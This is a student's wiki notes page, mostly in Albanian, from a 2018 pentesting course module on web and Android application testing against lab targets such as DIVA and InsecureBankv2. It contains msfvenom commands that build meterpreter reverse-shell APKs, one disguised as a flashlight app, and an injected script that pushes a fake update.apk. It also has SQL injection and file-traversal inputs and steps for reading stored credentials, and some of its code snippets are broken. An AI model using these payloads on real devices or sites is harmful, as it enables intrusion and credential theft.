dardan:cyberacademy:module-7-web_application_pentesting
temper data, burb suite md5sum filename captach bohet bypass tu mos e shkru captaca captacha e rujtje ne cookies e validon nje captcha manedj e perdor cdo her te njejten captch ne qat session captacha gjendet se eshte tu u perserit == threats te nje kompanie pharmaceutic == -goverment/rules -criminal organizations -competition -chinese apt -treg jo lojal -black mails -insiders threats mobile front: xml mobile api: android, iOS, balackbarry, logging: elk stack,splunk, qradar, gfi, solarwinds databases: MS sql, my sql, oracle, db2 etj backend: php, asp, python etj midleware front end == threat actors te rasi i nje news media== politika konkurrenca black hats availability reputation market sharing
REMEDIATION Insecure Direct Object Reference (IDOR) 172.16.60.85 172.16.60.88 Download Nessus from here. Choose the Ubuntu packages (or the Debian ones) Open a Terminal and go to the download directory (cd) Run sudo dpkg -i Nessus*.deb. Enter root password. Start it sudo /etc/init.d/nessusd start Open a browser and go to https://localhost:8834/
17.10.2018
Broken Authentication
Password recovery function
modify email ku shkon opt me email ku kemi qasje
email hap
kerkon me hap mail te re
e krijon nje mail
e zevendeson me email e krijuar
e intercept e shtin email e re
funksioni e gjet mail qel
e qon confirmimin mi kallxu ku me qu konfirmimin
kete konfirmim e modifikon me mail te re edhe konfirmimi shkon ne mail te re
cdo mail ne facebook database eshte nje uique ID e re
kjo punon vetem me mails te reja
sql injection
sensitive data export
bypass cludeflare
tu provu mi gjet subdomain
tu gjet misconfiguration
tu e kqyr historin e domains (qysh e ka pas para se me hi ne cludeflare) rekomandohet me ndrru IP para se me hi CF
bruteforce sub-domains,rekomandohet me hi krejt subdomains
full path ne url, tregon qa mun me hack ne qat server
XML and XXE attack
bypass WAF
check for encoders
check for sql inj "
for symbols '
Security Misconfiguration
NAT all port nat to one port
SSH open
admin page open to external
device console unprotected
19.10.2018 munges
22.10.2018
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.65.141 LPORT=9999 R> king2.apk
e index.html inserto
<script>
window.location.assign("update.apk");
test with android by uploading a malware in android and meterpreter to manage the session kur ta viziton faqen dikush me te dal redirected update.apk mitmf ???
24.10.2018 munges
26.10.2018 msfvenom -x flashlight.apk -p android/meterpreter/reverse_tcp LHOST=172.16.60.69 LPORT=9559 R> flash-light.apk
29.10.2018
import request
payload = {"username":"jack","password":"P@ssw0rd","from_acc":"5555555","to_acc":"999999",""amount,"10"}
r = request.post("http://127.0.0.1:8888/dotransfer", data=payload)
print r.text
python sendMN.py
### test if we can view account state
/getaccounts
nano getA.py
import request
payload = {"username":"dinesh","password":"P@ssw0rd"}
r = request.post("http://127.0.0.1:8888/getaccounts", data=payload)
print r.text
me burb e validojm changepassword requestin
intersept requestin kur e ke ndrru passwordin
nano changPassowrd.py
import request
payload = {"username":"jack", "newpassword":"Password"}
r= request.post("https://127.0.0.1:8888/changepassword", data=payload)
print r.text
adb shell
adb pull
adb push
pm list package
am start -n
am start -n com.android.insecurebankv2/.Postlogin
am start -n jakhar.aseem.diva
apktool -d emri
31.10.2018 me zgjedh nej .. me exploit me dokumentu
## insecure logging ##checkout tu e shkru cc number edhe shiko a pe sheh cc number me command me posht # adb logcat | grep credit ## nese e sheh plain text cc number kjo i bjen qe eshte vul. apltool d diva.apk -o diva-extarcted ne extracted folder #cat HardcodeActivity.smali 3. adb shell # be sure OS is rooted 3.insecure data storage - part1 create user/pass su - to get root access cd /data/data/jahkar/aseem.diva/shared_prefs ls cat *.xml :) you will see user and pass plain text 4. adb shell create user/pass cd /data/data/jahkar/aseem.diva/ ls then cd databases ids2 chosen adb pool /data/data/jahkar/aseem.diva/databases/ids2 file ids2 ##s1llite3 is found sqlite3 ids2 .tables select * from myuser; 5. adb shell create user/pass cd /data/data/jahkar/aseem.diva/ when user is created a file named uinfo23423j2tmp cat uinfo23423j2tmp :) you will see user/pass created on app 6. adb shell grant storage access for diva app create user/pass cd /mnt/sdcard cat .uinfo.txt :) you will see user/pass created on app 7. search 1'or'1'='1 this will query for all users in database 8. view an url ex: https://www.google.com than you will be able to view or move through directories ex file:// or file://etc/filename file:///etc/hosts
dardan/cyberacademy/module-7-web_application_pentesting.txt · Last modified: 2018/10/31 20:00 by dardan